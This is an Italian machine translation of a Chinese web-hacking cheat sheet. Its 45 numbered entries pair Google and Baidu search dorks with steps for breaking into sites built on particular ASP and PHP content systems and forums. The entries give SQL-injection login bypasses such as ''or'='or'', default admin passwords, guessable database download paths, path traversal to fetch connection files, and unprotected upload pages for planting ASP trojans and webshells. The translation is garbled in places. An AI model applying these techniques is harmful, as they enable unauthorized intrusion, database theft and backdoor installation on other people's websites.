1,
Vai su Google, cerca qualche parola chiave, edit.asp? Ci sono molti polli coreani, la maggior parte dei quali sono database MSSQL!
2,
Vai su Google, site:cq.cn inurl:asp
3,
Usa il pollo da scavo e un ASP.
Il nome del file è login.asp
Il gruppo di percorso è /manage/
La parola chiave è went.asp
Usa 'or' = 'or' per atterrare
4,
Parole chiave: Co Net MIB Ver 1.0 Sistema di Gestione dei Background del Sito MIB
La password dell'account è 'or'='or'
5.
Sistema di acquisto dinamico
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp e upLoad_c1.asp sono due scelte casuali, e la maggior parte degli amministratori ignora queste due vulnerabilità
6。
L'indirizzo predefinito del database è blogdata/acblog.asa
Parole chiave: acblog
7.
Baidu /htdocs
Puoi caricare i file ASA direttamente nella registrazione!
8.
/Database/#newasp.mdb
Parole chiave: NewAsp SiteManageSystem Versione
9.
Con un escavatore
Parole chiave: Alimentato da WEBBOY
Pagina: /upfile.asp
10.
Cerca la parola chiave Ver5.0 Build 0519 in baidu
(C'è una vulnerabilità di caricamento)
11.
Upfile_Article.asp bbs/upfile.asp
Inserisci parole chiave: powered by mypower,
12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
13.
Ora cerca GOOGLE la parola chiave intitle:website assistant inurl:asp
14.
Parole chiave: Home Ultime notizie Guida per principianti Centro download di musica dance Articoli classici Stile Player Attrezzatura Acquisto Sito Voci Amicizia Collegamento su questo sito forum
Scava la parola chiave chicken Tim setup.asp
15.
Database del forum VBulletin
Indirizzo predefinito del database!
/includes/functions.php
Strumenti:
1. Sito web Hunter Indirizzo di download: Baidu Google!
2. Google
Parole chiave:
Alimentato da: vBulletin Versione 3.0.1
Alimentato da: vBulletin Versione 3.0.2
Alimentato da: vBulletin Versione 3.0.3
Uno di questi andrà bene
16.
1. Apri la ricerca Baidu o GOOGLE e inserisci tramite il carrello della spesa ASP.
open source。 Questo è un sistema di centro commerciale.
2. In fondo al sito web c'è una LC di Comersus Open Technologies. Aprilo e guarda ~~comersus system~
Indovina comersus.mdb. è il nome del database
Il database è posizionato dopo database/,
Quindi database/comersus.mdb
comersus_listCategoriesTree.asp cambiato in database/comersus.mdb e non può essere scaricato.
Poi rimuovi lo store precedente e aggiungi database/comersus.mdb da provare
17.
Programma ufficiale di Legend senza preoccupazioni.
1. Indirizzo gestione background: http:// il tuo nome di dominio /msmiradmin/
2. Account predefinito di gestione background: msmir
3. Password predefinita per la gestione background: msmirmsmir
Il file del database è http:// il tuo nome di dominio /msmirdata/msmirArticle.mdb
Il file di connessione al database è ***********/Conn.asp
18.
Inserisci /skins/default/ in Baidu.
19.
Utilizzare escavatori
Meccanismo critico: alimentazione di Discuz
Path: /wish.php
Cooperazione:
Forum Discuz! wish.php uso di strumenti di vulnerabilità per inclusione remota
20.
Carica vulnerabilità.
Strumento: Domain3.5
Website Hunter versione 1.5
Parola chiave alimentata da mypower
Le pagine o i file rilevati vengono inseriti nel upfile_photo.asp
21.
Nuove vulnerabilità cloud
Questa vulnerabilità è una soluzione valida per ACCESS e SQL.
Parole chiave di ricerca Google "Informazioni su questo sito - Aiuto sito - Cooperazione pubblicitaria - Dichiarazione di download - Connessione di amicizia - Sitemap - Gestisci il login"
Flash/downfile.asp?url=uploadfile/: /.. /conn.asp commit alla radice del sito. Puoi scaricare conn.asp
La maggior parte di essi sono stazioni di download di codice sorgente, software, ecc.
Spesso si scontra che se il database è + all'inizio o al centro, # può essere sostituito con %23 per scaricare
\database\%23newasp.mdb
Per example:#xzws.mdb cambiamento a %23xzws.mdb
22.
All Eat All Mall + Power Upload System
Strumenti utilizzati: Dig Chicken v1.1 Ming Boy
Marketplace**:
Parole chiave: Shopping->Aggiungi al carrello->Vai alla cassa->Conferma le informazioni del destinatario-> metodo di pagamento-> metodo di consegna-> paga online o invia soldi dopo aver effettuato un ordine-> conferma di rimesse->consegna-> completamento
Pagina delle vulnerabilità :upload.asp
upfile_flash.asp
Potere**:
Parole chiave: alimentato da mypower
La pagina delle vulnerabilità :upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
Inietta vulnerabilità
Baidu cerca il blog di IOJ
24
Muoversi è facile
Indice delle colonne
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
Strumenti: Cacciatore di siti web
Keywords:inurl:Went.asp
suffisso: gestire/login.asp
Password: 'or'='or'
26.
**Warcraft Server Privato
Strumenti necessari: un trojan ASP.
Dominio 3.5 Ming Kid
Parole chiave: Tutti i diritti riservati Design: Game Alliance
Indirizzo di background: admin/login.asp
L'indirizzo del database: chngame/#chngame.mdb
27.
La vulnerabilità è un errore che sfrutta le impostazioni IIS dell'amministratore
L'uso delle parole chiave baidu è un nome di scrittura relativamente raro
Rete di trasloco: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
Movimento: admin_articlerecyclebin.asp
28.
Vulnerabilità di esplosione di database di stazioni straniere
Parole chiave: triste Libro degli ospiti di Raven
Indirizzo password: /passwd.dat
Indirizzo di background: /admin.php
29.
Vulnerabilità cross-site di Discuz 4.1.0
Utilizzare strumenti: 1. Browser WAP
2. Convertitore di codifica WAP
Parole chiave: "intextiscuz!" 4.1.0"
30.
Parole chiave: Shanks
Percorso di sfondo /system/manage.asp
Trasmette direttamente i trojan ASP
31.
Strumenti
1: Cacciatore di siti web
2: Malaysia One
Parole chiave: Non disattivare i cookie, altrimenti non potrai accedere
Inserire diy.asp
32.
Parole chiave: Team5 Studio Tutti i diritti riservati
Database predefinito: dati/team.mdb
33.
Strumenti: Lettore di database Excavator Fuchen
Parole chiave: Profilo aziendale Display prodotto Elenco prodotti
Suffisso aggiunto: /database/myszw.mdb
Indirizzo di background: admin/Login.asp
34.
Chiave sub-XXX inurl:Nclass.asp
Scrivi un Trojan in "Impostazioni di sistema".
sarà salvato fino al config.asp.
35.
Se non entri in background, usi comunque la WEBSHELL
data.asp?action=BackupData Il percorso predefinito per il backup del database
36.
Strumento: WebShell per il Cacciatore di Siti Web
Keywords:inurl:Went.asp
suffisso: gestire/login.asp
Password debole: 'or'='or'
37.
Parole chiave: doveva byCDN_NEWS
Scansiona l'articolo e aggiungi un ' per testare il punto di iniezione
L'indirizzo backend :admin_index.asp
38.
**Sistema di Comunicati Stampa Thunder Pool
Parole chiave: leichinews
Rimuovi quella dopo leichinews.
Tag: admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
Poi carica il cavallo.....
Visita Uppic anran.asp Landing Horse.
39.
Parole chiave: ower System Of Article Management Ver 3.0 Build 20030628
Database predefinito: database\yiuwekdsodksldfslwifds.mdb
Indirizzo di background: Scansiona te stesso!
40.
1. Trovare un gran numero di punti di iniezione tramite una ricerca GOOGLE
Parole chiave: asp?id=1 gov.jp/ asp?id=
Numero di pagine: 100
Linguaggio: Compila qualsiasi lingua tu voglia **
41.
Parole chiave: Powered da:94KKBBS 2005
Usa la funzione di recupero password per recuperare l'admin
Domanda: dddddd Risposta: dddddd
42.
Keywords:inurl:Went.asp
Il background è gestione/login.asp
Password di background: 'or'=' o 'or'='or' Accedi per inserire
L'indirizzo predefinito del database è atabase/DataShop.mdb
43.
Parole chiave: ****** inurl:readnews.asp
Cambia l'ultimo/in %5c, esponi direttamente il database, guarda la password e inserisci lo sfondo
Basta aggiungere una notizia. Inserisci la nostra frase Trojan nel titolo.
44.
Strumento: Un cavallo di
BBsXp 5.0 sp1 admin guesser
Parole chiave: powered by bbsxp5.00
Vai sullo sfondo e torna indietro di una frase!
45.
Parole chiave: Core del programma: esperto nell'apertura di negozi online BJXSHOP
Contesto: /admin
|